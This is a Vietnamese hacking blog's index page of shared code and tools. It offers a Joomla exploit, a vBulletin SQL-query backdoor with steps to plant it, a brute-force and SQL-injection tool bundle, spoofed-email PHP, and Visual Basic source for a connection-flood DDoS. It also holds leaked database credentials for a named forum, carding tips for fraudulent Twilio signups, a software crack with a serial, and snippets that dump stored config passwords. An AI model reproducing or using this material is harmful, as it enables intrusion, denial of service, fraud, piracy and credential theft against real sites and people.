Hiển thị các bài đăng có nhãn Code - Source - Software. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Code - Source - Software. Hiển thị tất cả bài đăng

Joomla Exploit (Code)

In this video you will learn how to hack joomla
Note:- This exploit only works on old version of joomla

Download and open the below file in your browser
https://www.dropbox.com/s/yoo0xkjem8cf0it/x.html 

Open it and edit it with your Username & Pass

Note:- you need to put different pass here password should not match

Follow the video for proper guidance and do the steps

Xem Thêm

 

vBulletin Killer

Xem Thêm

 

Hidden Baby cho vBulletin (all version)

Screenshot:


http://s14.postimage.org/qfmtsljjj/Screen_shot_2012_06_25_at_21_35_24.png


Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....)

Cách sử dụng

Quote:
+ Up thẳng vào thư mục forum vBB (ngang hàng với index.php).
+ Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql

hoặc

+ Admincp -> Product & Plugin Manager -> Add new plugin ->
- Hook Location : tùy thích (mình hay dùng faq_complete)
- Plugin PHP Code : Copy nguyên code ở dưới vào, bỏ "<?php" ở đầu và "?>" ở cuối đi
- Plugin is active : Yes
+ Run : http://site.com/forum/faq.php?vnh= Câu lệnh sql
Download:
http://www.mediafire.com/?y9yz0gm6r4e4uxr
 Nguồn: VNHack.

Xem Thêm

 

[vBulletin] Admin Reset Tools - Công cụ dành cho Admin

Trong trường hợp bạn bị mất quyền Admin, mất hết Permission (hoặc bị thay đổi permission).

Công cụ này sẽ giúp bạn lấy lại group Admin và toàn quyền quản lí diễn đàn (Full Administrator Permission).

Demo:

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/01.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/02.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/03.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/04.png

Download:
File name: Admin-Reset-Tools.php
Password Unlock: junookyo

* Sử dụng:
Thay đổi thông tin DataBase như config.php của bạn:
// MySQL Info
    $host = 'localhost';
    $user = 'root';
    $password = '*****';
    $dbname = '*****'; 
Sau đó upload lên ngang hàng index forum và sử dụng.

P/S: Thực ra thì admin hoàn toàn có thể tự thay bằng cách vào phpMyAdmin, đây chỉ là công cụ giúp bạn khôi phục group Admin và toàn quyền quản lí Forum của mình nhanh nhất! :)

Nguồn: Junookyo !

Xem Thêm

 

Share code nháy máy

Nguyên liệu:
- Acc Skype có balance
- Máy đã cài Skype + Apache + php 5.x
- Skype4COM: http://developer.skype.com/resources/Skype4COM.zip

Cách sử dụng:
- Giải nén Skype4COM.zip vào "C:\Program Files\Common Files\Skype\"
- Bật hộp thoại CMD gõ: REGSVR32 C:\Progra~1\Common~1\Skype\Skype4COM.dll xong ấn OK
- Bật Skype, Apache
cuối cùng là đê mô
Highslide JS

Xem Thêm

 

Reiluke Tools

Bộ Tool này gồm 14 em gồm các chức năng sau:
admin finder
blind Sqli
cpanel bruteforcer
duplicate remover
email brute
email checker
exploit scanner
php rapidshare checker
rapidshare checker
sms bomber
sqli column counter
sqliHelper 2.7
steam checker
Link Download:
http://www.mediafire.com/?g3a8eqqu614wzev


Nguồn: http://junookyo.blogspot.com/2012/09/reiluke-tools.html

Xem Thêm

 

Bug tin nhắn FaceBook

Thực chất là fake mes thôi
php dưới

?php

$to 
'victim@facebook.com';$subject '';$message 'Hello, hacked by Duong';$header 'From: admin@binhduong-ug.com
Reply-To: admin@binhduong-ug.com'
;$mail mail($to,$subject,$message,$header);

if(
$mail) {
echo 
'Your Email was Sent Succesfully to '.$to;
}
?><hr />
<hr />

Xem Thêm

 

Share Code - data Guester.org 24/10/2012 FORUM UG

admin còn non trẻ quá


http://guester.org/


$config['Database']['dbname'] = 'break_1';


$config['MasterServer']['username'] = 'break_1';

$config['MasterServer']['password'] = 'sida123';

 code : http://www.mediafire.com/?uauzfl46nd35xaj
link data 24/10/2012 : http://www.mediafire.com/?iw5hwjjh3jj5x92

Xem Thêm

 

Share Skin ĐCVN

Vui lòng để nguồn khi share lại skin
Skin RIP nên sẽ không support
Bạn nào cài có lỗi cứ post bài lên mình sẽ giúp

P/s: Đọc file huongdan.txt trong thư mục HUONG DAN để làm đúng nhất

Cảm ơn đã ủng hộ skinvbb.net

Download: http://www.mediafire.com/?42zkuivnzeiab29

Pass: skinvbb.net

Xem Thêm

 

Share code muagi.vn

Xem Thêm

 

Javascript - Tạo Status độc cho Yahoo

Javascript - Tạo Status độc cho Yahoo

Demo:


Download:
http://www.mediafire.com/?7f7wukqz2tku5sb
Nguồn: VHB Group.

Xem Thêm

 

Share code Firefox's Start Page (đẹp)

Demo ảnh:

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/1-1-200612-23-05AM.png
Demo online:
http://www.ghostclub.info/code/firefox/
 Download:
http://www.mediafire.com/?g1sb5zgqlntysow
Pass Unlock:
junookyo
P/S: Code này RIP ở Firefox (thấy đẹp nên zip chơi). Đã edit, thêm đoạn code check khung search (ko nhập gì mà ENTER sẽ hiện alert). Thích hợp làm trang home, có thể sửa các URL ở khung button phía dưới! Nói chung là code đẹp :D.

Xem Thêm

 

Code giaitrisms.net

Xem Thêm

 

Share code Gallery đẹp phù hợp làm site cá nhân

Cái này chắc nhiều bác có rồi, nhưng em post lấy tinh thần, code Gallery khá đẹp.
Demo: http://appleviet.info

Hidden Block (1 post(s) are required, you have 5):
http://appleviet.info/gallery.rar

Xem Thêm

 

_Code tuyển dụng Đẹp


_Source+data
http://www.mediafire.com/?bva8uaav4wzx78b

Xem Thêm

 

[Source] DDOS Lỏm :-<

Code
Timer.Enabled = False
End Sub

Public Sub LoadSock(Number As Integer)
On Error GoTo ExitSub
Dim X As Integer
X = 1
Do Until X = Number
Load Winsock(X)
X = X + 1
Loop
ExitSub:
End Sub

Private Sub Timer_Timer()
On Error Resume Next
Dim X As Integer
Do Until X = SocksTxt.Text
Winsock(X).Close
Winsock(X).Connect VicTxt.Text, PortTxt.Text
X = X + 1
Loop
OnlineTxt.Text = SocksTxt.Text
End Sub
Public Sub UnloadSock(Number As Integer)
On Error GoTo ExitSub
Dim X As Integer
X = 1
Do Until X = Number
Unload Winsock(X)
X = X + 1
Loop
ExitSub:
End Sub


Modules
Public Function WriteLog(LogData As String)
Open App.Path & "\fgonl.php" For Append As #1
Print #1, LogData
Close #1
End Function

Xem Thêm

 

Share tool Find Info mới

Dùng để tìm info ccnon


http://www.mediafire.com/?cfbs0cqnd11a6oc

Xem Thêm

 

Source Fake call and SMS

Download code
http://openvbx.org/download
cài đặt bình thường

vào đây reg 1 tài khoản
https://www.twilio.com/try-twilio
CCV + fake sock đủ tiền là qua 
Mới đầu reg thì nó free cho 30$ nhưng anh em cứ add thêm 50$ xài chơi.
Buy ít Phone in.

Xem Thêm

 

Bẻ Crack idm cực kì đơn giản. Mọi phiên bản

Tắt idm.
Vào đây C:\Windows\System32\drivers\etc.
Chon "hosts" mở bằng notepad.
Copy cái này vào cuố


127.0.0.1 localhost
::1 localhost
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com
127.0.0.1 mirror3.internetdownloadmanager.com
 Mở IDM lên.
Nhập đầy đủ thông tin.
Serial:
QQFKP-GIYQM-UCIJI-655YR
Mọi bản IDM đều xài được đó nha.

Xem Thêm

 

Code - View File Config Zend (Not dezend )

<?
include 'includes/config.php';
echo $config['Database']['dbname'];
echo "<br>";
echo $config['MasterServer']['username'];
echo "<br>";
echo $config['MasterServer']['password'];
?>
 2.
<?php include('xxx.php'); print_r($GLOBALS); ?> 

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương